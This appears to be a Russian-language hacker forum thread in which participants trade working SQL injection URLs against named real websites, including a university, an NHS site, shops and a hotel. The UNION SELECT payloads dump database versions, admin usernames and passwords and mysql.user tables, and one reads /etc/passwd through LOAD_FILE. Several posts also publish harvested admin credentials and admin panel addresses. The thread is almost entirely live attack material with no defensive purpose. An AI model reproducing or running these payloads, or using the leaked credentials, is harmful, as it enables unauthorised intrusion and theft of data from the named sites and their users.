SQL Инъекции

1) Не осилил =(

2) Осилил, гуд. Пароли без шифровки, присутствуют мейлы!!!

admin:HellBoy:[email protected]

 

Code:

http://www.grinderclinic.ru/index.php?section=-1+union+select+convert(version()+using+cp1251)/*

ничего интересного не нашел..

Code:

http://www.rustrana.ru/new.php?nid=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14/*&new=1

аналогично.. лень перебирать таблицы потыркал наугад и забил)

 

Code:

http://www.linkdump.be/index.php?y=-2003+union+select+1,2,user,4,5,6,7,8+from+users/*&m=9

колонку с пасами не нашёл =(

 

http://www.facilities.upenn.edu


University of Pennsylvania

Code:

http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-407+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11/*

 

есть подозрение, что пароль в третьем столбце

Code:

http://www.linkdump.be/index.php?y=-2003+union+select+u.*+from+users+u/*&m=9

а сопоставить с логином - по id или email

Code:

http://www.linkdump.be/index.php?y=-2003+union+select+1,2,id,user,email,6,7,8+from+users/*&m=9

 

shop

Code:

http://www.velocity.la/viewnewsarticle.php?id=-8+union+select+1,2,username,password,5,6,7+from+admin/*

http://www.velocity.la/admin
user:admin
pass:admin

Code:

http://www.skirtsinadvertising.com/interview.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

 

Code:

http://www.ukmotoringdirectory.co.uk/motoring.php?id=2025+UNION+SELECT+null,null,convert(VERSION()+using+latin1),null,null,null,convert(password+using+latin1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+admin/*
[I]админка: http://www.ukmotoringdirectory.co.uk/admin[/I]

http://www.chathamhouse.org.uk/index.php?id=5&cid=110 
[I]19 колонок, 3 версия[/I]

http://www.southcentral.nhs.uk/page.php?id=182%20group%20by%209/*
[I]срабатывает редирект :(
версия 4.0.26 
база nhssc_db[/I]

спасибо -={x_Lex}=- за помощь

 

еле допёр какие там поля в таблице.

 

Code:

http://www.hotelcammerpoorte.be/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,password),6+from+users/*&lang=EN

user: Admin
password: 1000
http://www.hotelcammerpoorte.be/admin.php

 

Вывод в title
____

 

Code:

http://www.4iper.net/article.php?doc_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Code:

http://peoplehost.com/support/kb2.php?q_id=-1+union+select+1,concat(version(),char(58),user()),3,4,5,6,7/*

Code:

http://quizfarm.com/test.php?q_id=-1+union+select+1,concat(table_name,0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+21,22/*

Code:

http://www.sinemrenault.com/trk/renault/haberler.php?H_ID=-1+union+select+1,convert(version()+using+latin1),3,4,5,6+from+users/*

Code:

http://www.radata.com/store/index.php?hid=-1+union+select+1,concat(convert(username+using+latin1),0x3a,convert(password+using+latin1)),3+from+user+limit+0,1/*

Code:

http://www.mersin.edu.tr/icerik.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user,0x3a,password),26+from+mysql.user/*

Code:

http://www.saglikbilgisi.com/haber.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*

 

Наугад выбрал:

Code:

http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/*

А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:

Code:

http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*

Я долго ржал.

 

2ShadOS
ну тогда уж сразу вывел бы данные или это уже не в моде?

Code:

http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),password)+from+users/*

 

Code:

http://www.oebu.ch/de/artikel.php?id=-324+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*

Code:

http://www.rueleon.net/manifestations.php?Id=-51+union+select+LOAD_FILE(0x2f6574632f706173737764)/*

 

Code:

http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9/*
http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

Code:

http://www.pomoyka.org/index.php?part=f&id=-1+union+select+1,convert(concat(database(),char(58),user(),version()),char),3,4/*

 

2ShadOS
повидимому ты не прочитал предыдущий мой пост

Code:

http://www.avilys.lt/index.php?id='+UNION+select+concat(name,char(58),pass)+from+admins/*

 

боян, небоян хз.
Вытащил все, юзеров перебираем лимитом

Code:

http://www.cahiersdufoot.net/article.php?id=-1322+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

 

а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:

Code:

http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

 

версия MySql

Code:

http://www.afghannews.net/index.php?newsgroup=6+union+select+null,VERSION(),null,null,null,null,null,null,null,null,null,null,null/*

логин текущего пользователя базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,USER(),null,null,null,null,null,null,null,null,null,null,null/*

имя используемой базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,DATABASE(),null,null,null,null,null,null,null,null,null,null,null/*

И ещё если за мест null поставить попарядку 1,2,3 .... то на страничке дабавится цифра 8 )))))